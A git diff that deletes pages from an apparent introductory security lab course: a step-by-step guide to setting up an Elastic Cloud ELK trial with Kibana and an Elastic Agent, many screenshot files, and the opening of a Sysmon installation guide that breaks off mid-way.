-![Powershell](./images/pic_of_box.PNG)
-
-Our Elastic Agent is installed and configured to be connected to our ELK instance in the cloud.  **Part three** will cover how to configure Sysmon to submit logs to this Elastic Agent.  This will ingest the logs to appear in **Kibana**.
-
-[Part Three](./sysmon_logs.md "Configuring Sysmon")
-
-***
-***Continuing on to the next Lab?***
-
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
-
-***Finished with the Labs?***
-
-
-Please be sure to destroy the lab environment!
-
-[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
-
----
diff --git a/IntroClassFiles/Tools/IntroClass/md/elk_in_the_cloud.md b/IntroClassFiles/Tools/IntroClass/md/elk_in_the_cloud.md
deleted file mode 100644
index d3c9fd57..00000000
--- a/IntroClassFiles/Tools/IntroClass/md/elk_in_the_cloud.md
+++ /dev/null
@@ -1,104 +0,0 @@
-#### ELK in the Cloud
----
-
-!!! This is part one of a three-part series.
-	[Part Two](./elastic_agent.md "Elastic Agents")
-	[Part Three](./sysmon_logs.md "Configuring Sysmon")
-
----
-
-ELK combines three technologies and provides a powerful solution when working with large data sets.  In addition, we are able to setup **SIEM** rules to alert us as defenders to attacks on our organization.
-
-* E - Elasticsearch
-* L - Logstash
-* K - Kibana
-
-ELK enables defenders to detect attacks and conduct threat hunting.
-
-To learn ELK, we don't need several servers or to spend large sums of money.  We can get into the driver's seat and experiment with ELK by using the Elastic Cloud 14-day trial.  The trial does not require a credit card to get started. You only need an email and a password.
-
-**1. Set up an account.**
-
-[Start your free Elastic Cloud Trial](https://cloud.elastic.co/registration?fromURI=%2Fhome "https://cloud.elastic.co/registration?fromURI=%2Fhome")
-
-This link is for the trial sign up page. Start a trial by signing up.
-
-![Signup page for Elastic Cloud](./images/cloud_signup.png)
-
-Watch your email for a confirmation. The email will look something similar to this.
-
-![Elastic Confirmation Email](./images/elastic_email.png)
-
-Click **"Verify and Accept"**.  You should be redirected to the cloud login page.  If you're not redirected, you can find it here.
-
-[Elastic Cloud Log In](https://cloud.elastic.co/login "https://cloud.elastic.co/login")
-
-After logging in, the page will look like this.
-
-Fill out the proper field with the correct information pictured below and select the check boxes with red dots.
-
-Once those fields are filled out click "Next"
-
-![Welcome To Elastic](./images/elastic_welcome.png)
-
-**2. Start an ELK instance.**
-
-Upon clicking **Next** you will see the following page.
-
-For my instance, I will be calling it **"security-development"**. Make sure to enter the name of your deployment and click **"Create Deployment"**.
-
-![Creating Delployment](./images/deployment2.PNG)
-
-Next we will see this page.
-
-![Creating Creds](./images/creds3.PNG)
-
-Elastic will present the credentials for this **ELK** stack. There is the option to download a CSV of the credentials. If you decide to hold onto these credentials, **don't** lose them.
-
-Then we will need to wait for the continue button to turn **blue**, once that's done click continue.  
-
-![Waiting For Deploy](./images/waiting_for_deploy4.PNG)
-
-We will be greeted with menu of options, we want to **skip** that menu.
-
-![Skip Prompt](./images/skip_prompt5.PNG)
-
-Then at the top of the page we want to click search and type **"kibana"** and hit enter.
-
-![Search Kibana](./images/kibana_search6.PNG)
-
-Once the next page load we want to add **kibana**. Select **"Add Kibana"**
-
-![Add Kibana](./images/add_kibana7.PNG)
-
-We will next be prompted to **"Install Elastic Agent"** This is what we are going to put on our machine to monitors what's happening. Click **"Install Elastic Agent"**.  
-
-![Add Elastic Agent](./images/kibana_loading8.PNG)
-
-The next page we meet will have a wall of text. Select **"windows"**.
-
-We will need to click the **"Copy to Clipboard"**.
-
-![Add Elastic Agent](./images/windows_kibana.PNG)
-
-Keep this command saved.  It is recommended to paste this command into a text file where you won't lose it. In this example, I saved it to a file I called **"agent.txt"**.  We will use this command later.
-
-![](./images/agent_txt.png)
-
-The ELK stack is now configured and we have our connection information saved.  **Part two** will cover how to install and configure an Elastic Agent.
-
-[Part Two](./elastic_agent.md "Elastic Agents")
-
-***
-***Continuing on to the next Lab?***
-
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
-
-***Finished with the Labs?***
-
-
-Please be sure to destroy the lab environment!
-
-[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
-
----
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/Capture1.PNG b/IntroClassFiles/Tools/IntroClass/md/images/Capture1.PNG
deleted file mode 100644
index d657dd75..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/Capture1.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/account_confirmed.png b/IntroClassFiles/Tools/IntroClass/md/images/account_confirmed.png
deleted file mode 100644
index 47cbc06b..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/account_confirmed.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/add_agent.png b/IntroClassFiles/Tools/IntroClass/md/images/add_agent.png
deleted file mode 100644
index 2d592bb4..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/add_agent.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/add_elastic_agent.png b/IntroClassFiles/Tools/IntroClass/md/images/add_elastic_agent.png
deleted file mode 100644
index f60207fa..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/add_elastic_agent.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/add_kibana7.PNG b/IntroClassFiles/Tools/IntroClass/md/images/add_kibana7.PNG
deleted file mode 100644
index 0d3b904e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/add_kibana7.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/add_windows.png b/IntroClassFiles/Tools/IntroClass/md/images/add_windows.png
deleted file mode 100644
index 5bd58fa6..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/add_windows.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/addelastichost.PNG b/IntroClassFiles/Tools/IntroClass/md/images/addelastichost.PNG
deleted file mode 100644
index e995d9d7..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/addelastichost.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/agent_txt.png b/IntroClassFiles/Tools/IntroClass/md/images/agent_txt.png
deleted file mode 100644
index 92c9eec1..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/agent_txt.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/agents_menu.png b/IntroClassFiles/Tools/IntroClass/md/images/agents_menu.png
deleted file mode 100644
index 84c188ba..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/agents_menu.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/agents_tab.png b/IntroClassFiles/Tools/IntroClass/md/images/agents_tab.png
deleted file mode 100644
index dd88846b..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/agents_tab.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/another_folder.png b/IntroClassFiles/Tools/IntroClass/md/images/another_folder.png
deleted file mode 100644
index c1c5ff9f..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/another_folder.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/applied_filter.PNG b/IntroClassFiles/Tools/IntroClass/md/images/applied_filter.PNG
deleted file mode 100644
index d5f85419..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/applied_filter.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/backtointegrations.png b/IntroClassFiles/Tools/IntroClass/md/images/backtointegrations.png
deleted file mode 100644
index cb3b6e93..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/backtointegrations.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/cd_elastic.png b/IntroClassFiles/Tools/IntroClass/md/images/cd_elastic.png
deleted file mode 100644
index 2b756ce5..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/cd_elastic.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/clickinstalledintegrations.png b/IntroClassFiles/Tools/IntroClass/md/images/clickinstalledintegrations.png
deleted file mode 100644
index 5ead7752..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/clickinstalledintegrations.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/cloud_signup.png b/IntroClassFiles/Tools/IntroClass/md/images/cloud_signup.png
deleted file mode 100644
index e7c9fc1e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/cloud_signup.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_chrome.png b/IntroClassFiles/Tools/IntroClass/md/images/complete_download_chrome.png
deleted file mode 100644
index e7149d2d..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_chrome.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_edge.png b/IntroClassFiles/Tools/IntroClass/md/images/complete_download_edge.png
deleted file mode 100644
index 6fb3d79f..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_edge.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_firefox.png b/IntroClassFiles/Tools/IntroClass/md/images/complete_download_firefox.png
deleted file mode 100644
index bcf337ec..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_firefox.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_firefox_supplemental.png b/IntroClassFiles/Tools/IntroClass/md/images/complete_download_firefox_supplemental.png
deleted file mode 100644
index dbda4eaa..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/complete_download_firefox_supplemental.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/confirm_data.PNG b/IntroClassFiles/Tools/IntroClass/md/images/confirm_data.PNG
deleted file mode 100644
index 729538a9..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/confirm_data.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/copy_command.png b/IntroClassFiles/Tools/IntroClass/md/images/copy_command.png
deleted file mode 100644
index 7f61508d..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/copy_command.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/correct_folder.png b/IntroClassFiles/Tools/IntroClass/md/images/correct_folder.png
deleted file mode 100644
index 1b1e5ba6..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/correct_folder.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/create_deployment.png b/IntroClassFiles/Tools/IntroClass/md/images/create_deployment.png
deleted file mode 100644
index f3978905..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/create_deployment.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/createfilter.png b/IntroClassFiles/Tools/IntroClass/md/images/createfilter.png
deleted file mode 100644
index 15477598..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/createfilter.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/creds3.PNG b/IntroClassFiles/Tools/IntroClass/md/images/creds3.PNG
deleted file mode 100644
index 592461af..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/creds3.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/datasource_logs.png b/IntroClassFiles/Tools/IntroClass/md/images/datasource_logs.png
deleted file mode 100644
index 8f3a64e1..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/datasource_logs.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/deployment2.PNG b/IntroClassFiles/Tools/IntroClass/md/images/deployment2.PNG
deleted file mode 100644
index c6f8f58b..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/deployment2.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/download_elastic_agent.png b/IntroClassFiles/Tools/IntroClass/md/images/download_elastic_agent.png
deleted file mode 100644
index 6fc5919f..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/download_elastic_agent.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/download_selection.png b/IntroClassFiles/Tools/IntroClass/md/images/download_selection.png
deleted file mode 100644
index b863f64a..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/download_selection.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/download_selection_extract.png b/IntroClassFiles/Tools/IntroClass/md/images/download_selection_extract.png
deleted file mode 100644
index c2aea264..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/download_selection_extract.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/download_selection_extract_all.png b/IntroClassFiles/Tools/IntroClass/md/images/download_selection_extract_all.png
deleted file mode 100644
index 971fcbb1..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/download_selection_extract_all.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/elastic_creds.png b/IntroClassFiles/Tools/IntroClass/md/images/elastic_creds.png
deleted file mode 100644
index 7a3e68e7..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/elastic_creds.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/elastic_email.png b/IntroClassFiles/Tools/IntroClass/md/images/elastic_email.png
deleted file mode 100644
index 8f20a70c..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/elastic_email.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/elastic_welcome.png b/IntroClassFiles/Tools/IntroClass/md/images/elastic_welcome.png
deleted file mode 100644
index 7cecf721..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/elastic_welcome.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/enable_central_user.png b/IntroClassFiles/Tools/IntroClass/md/images/enable_central_user.png
deleted file mode 100644
index c699cd79..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/enable_central_user.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/filter.PNG b/IntroClassFiles/Tools/IntroClass/md/images/filter.PNG
deleted file mode 100644
index ff2c9733..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/filter.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/filter_results.png b/IntroClassFiles/Tools/IntroClass/md/images/filter_results.png
deleted file mode 100644
index d221269e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/filter_results.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/final.PNG b/IntroClassFiles/Tools/IntroClass/md/images/final.PNG
deleted file mode 100644
index 52c8ba12..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/final.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/finish_button.PNG b/IntroClassFiles/Tools/IntroClass/md/images/finish_button.PNG
deleted file mode 100644
index 51fdbf71..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/finish_button.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/finished_instance.png b/IntroClassFiles/Tools/IntroClass/md/images/finished_instance.png
deleted file mode 100644
index 0585b2d0..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/finished_instance.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/first_landing.png b/IntroClassFiles/Tools/IntroClass/md/images/first_landing.png
deleted file mode 100644
index 6c051a4a..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/first_landing.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/fleet_loc.PNG b/IntroClassFiles/Tools/IntroClass/md/images/fleet_loc.PNG
deleted file mode 100644
index 0727fb80..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/fleet_loc.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/incaseyourelost.png b/IntroClassFiles/Tools/IntroClass/md/images/incaseyourelost.png
deleted file mode 100644
index 97499ac5..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/incaseyourelost.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/installation.PNG b/IntroClassFiles/Tools/IntroClass/md/images/installation.PNG
deleted file mode 100644
index b3f29b8a..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/installation.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/installed_integrations.png b/IntroClassFiles/Tools/IntroClass/md/images/installed_integrations.png
deleted file mode 100644
index 4c457134..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/installed_integrations.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/integrations.PNG b/IntroClassFiles/Tools/IntroClass/md/images/integrations.PNG
deleted file mode 100644
index aed8b710..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/integrations.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/integrations_extras.PNG b/IntroClassFiles/Tools/IntroClass/md/images/integrations_extras.PNG
deleted file mode 100644
index c8debccc..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/integrations_extras.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/integrations_tab.png b/IntroClassFiles/Tools/IntroClass/md/images/integrations_tab.png
deleted file mode 100644
index e706c09e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/integrations_tab.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/kibana_discover.png b/IntroClassFiles/Tools/IntroClass/md/images/kibana_discover.png
deleted file mode 100644
index b25b963d..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/kibana_discover.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/kibana_landing.png b/IntroClassFiles/Tools/IntroClass/md/images/kibana_landing.png
deleted file mode 100644
index 7b7e25bf..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/kibana_landing.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/kibana_loading8.PNG b/IntroClassFiles/Tools/IntroClass/md/images/kibana_loading8.PNG
deleted file mode 100644
index 7adfa620..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/kibana_loading8.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/kibana_quicklink.png b/IntroClassFiles/Tools/IntroClass/md/images/kibana_quicklink.png
deleted file mode 100644
index e31c9977..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/kibana_quicklink.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/kibana_search6.PNG b/IntroClassFiles/Tools/IntroClass/md/images/kibana_search6.PNG
deleted file mode 100644
index c34d6bed..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/kibana_search6.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/ls_result.png b/IntroClassFiles/Tools/IntroClass/md/images/ls_result.png
deleted file mode 100644
index 420b5b2a..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/ls_result.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/menu_fleet.png b/IntroClassFiles/Tools/IntroClass/md/images/menu_fleet.png
deleted file mode 100644
index 9b57bcdb..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/menu_fleet.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/navigatetodiscover.png b/IntroClassFiles/Tools/IntroClass/md/images/navigatetodiscover.png
deleted file mode 100644
index 6a13f3cc..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/navigatetodiscover.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/navigatetodownloads.png b/IntroClassFiles/Tools/IntroClass/md/images/navigatetodownloads.png
deleted file mode 100644
index a7109638..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/navigatetodownloads.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/navigationmenu.png b/IntroClassFiles/Tools/IntroClass/md/images/navigationmenu.png
deleted file mode 100644
index d5b942fe..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/navigationmenu.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/open_kibana.png b/IntroClassFiles/Tools/IntroClass/md/images/open_kibana.png
deleted file mode 100644
index 58c6c45e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/open_kibana.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/open_kibana_2.png b/IntroClassFiles/Tools/IntroClass/md/images/open_kibana_2.png
deleted file mode 100644
index cfbd1f0b..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/open_kibana_2.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/panel_window.png b/IntroClassFiles/Tools/IntroClass/md/images/panel_window.png
deleted file mode 100644
index 4db777e9..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/panel_window.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/pic_of_box.PNG b/IntroClassFiles/Tools/IntroClass/md/images/pic_of_box.PNG
deleted file mode 100644
index b19e8956..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/pic_of_box.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/powershell.PNG b/IntroClassFiles/Tools/IntroClass/md/images/powershell.PNG
deleted file mode 100644
index a7ba4bdd..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/powershell.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/powershell.png b/IntroClassFiles/Tools/IntroClass/md/images/powershell.png
deleted file mode 100644
index a7ba4bdd..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/powershell.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/powershell_kibana9.PNG b/IntroClassFiles/Tools/IntroClass/md/images/powershell_kibana9.PNG
deleted file mode 100644
index 1bf9afba..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/powershell_kibana9.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/save_and_deploy.png b/IntroClassFiles/Tools/IntroClass/md/images/save_and_deploy.png
deleted file mode 100644
index 6ca93f1b..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/save_and_deploy.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/save_integration.png b/IntroClassFiles/Tools/IntroClass/md/images/save_integration.png
deleted file mode 100644
index e5899e38..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/save_integration.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/saveandnext.PNG b/IntroClassFiles/Tools/IntroClass/md/images/saveandnext.PNG
deleted file mode 100644
index 460fd263..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/saveandnext.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/select_security.png b/IntroClassFiles/Tools/IntroClass/md/images/select_security.png
deleted file mode 100644
index e03d3e70..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/select_security.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/select_windows.png b/IntroClassFiles/Tools/IntroClass/md/images/select_windows.png
deleted file mode 100644
index 8b50616a..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/select_windows.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/skip_prompt5.PNG b/IntroClassFiles/Tools/IntroClass/md/images/skip_prompt5.PNG
deleted file mode 100644
index 70e8c265..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/skip_prompt5.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/successful_agent_menu.png b/IntroClassFiles/Tools/IntroClass/md/images/successful_agent_menu.png
deleted file mode 100644
index 600e16ea..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/successful_agent_menu.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/successful_enroll.PNG b/IntroClassFiles/Tools/IntroClass/md/images/successful_enroll.PNG
deleted file mode 100644
index 7a921c4e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/successful_enroll.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/successful_enrollment.png b/IntroClassFiles/Tools/IntroClass/md/images/successful_enrollment.png
deleted file mode 100644
index 7f1fdf70..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/successful_enrollment.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_download.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmon_download.png
deleted file mode 100644
index 7dcbdf5d..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_download.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_extract.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmon_extract.png
deleted file mode 100644
index 1bc93569..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_extract.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_extract_all.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmon_extract_all.png
deleted file mode 100644
index c1978000..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_extract_all.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_result.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmon_result.png
deleted file mode 100644
index 308e1e69..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_result.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_running.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmon_running.png
deleted file mode 100644
index 644c7713..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_running.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_selected.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmon_selected.png
deleted file mode 100644
index 5ad3ad30..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmon_selected.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/sysmonfolder.png b/IntroClassFiles/Tools/IntroClass/md/images/sysmonfolder.png
deleted file mode 100644
index 8a6969cf..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/sysmonfolder.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/waiting_for_deploy4.PNG b/IntroClassFiles/Tools/IntroClass/md/images/waiting_for_deploy4.PNG
deleted file mode 100644
index 07cb8b20..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/waiting_for_deploy4.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/which_windows.PNG b/IntroClassFiles/Tools/IntroClass/md/images/which_windows.PNG
deleted file mode 100644
index f0f25d46..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/which_windows.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/windows_kibana.PNG b/IntroClassFiles/Tools/IntroClass/md/images/windows_kibana.PNG
deleted file mode 100644
index 2f0212db..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/md/images/windows_kibana.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/md/sysmon_logs.md b/IntroClassFiles/Tools/IntroClass/md/sysmon_logs.md
deleted file mode 100644
index 589f7d8f..00000000
--- a/IntroClassFiles/Tools/IntroClass/md/sysmon_logs.md
+++ /dev/null
@@ -1,158 +0,0 @@
-#### Sysmon Logs and Elastic Security
-
----
-
-!!! - This is part three of a three-part series.
-	[Part One](./elk_in_the_cloud.md "Elk in the Cloud")
-	[Part Two](./elastic_agent.md "Elastic Agents")
-
----
-
-By default, **Windows logs** are not ideal.  To get logs that are more readable and useful, we can use **Sysmon**. 
-
-**1. Download Sysmon**
-
-Follow this link to download Sysmon.
-
-[Download Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon")
-
-Find the **"Download Sysmon"** link.
-
-![Download Sysmon](./images/sysmon_download.png)
-
-We need to extract the **.zip** archive that we just downloaded. To do so, start by opening your **file explorer**.
-
-![](./images/OpeningFileExplorer.png)
-
-Then navigate to **Downloads** in the side panel, and click on the Sysmon **".zip"** archive.
-
-![](./images/navigatetodownloads.png)
-
-Now we can perform **"Extract All"** on the Sysmon Folder. 
-
-Ensure the Sysmon **".zip"** archive is selected.  It will be highlighted in **blue**.
-
-![Sysmon Extract All](./images/sysmon_extract_all.png)
-
-**"Extract"** to the Downloads folder.  Windows should auto-populate the Downloads path.
-
-Once you are finished, you should see something like this:
-
-![](./images/sysmonfolder.png)
-
-For the next step, we need to open **Windows PowerShell**. This can be done by clicking on the **PowerShell** icon in the taskbar.
-
-![](./images/OpeningPowershell.png)
-
-Enter the following command. You will need to substitute **[USER]** for the user you are using on your local system.
-
-<pre>cd C:\Users\[USER]\Downloads\Sysmon\</pre>
-
-Run the following command to install and start **Sysmon** as a service.
-
-<pre>.\Sysmon.exe -i -n -accepteula</pre>
-
-The output should look similar to this.
-
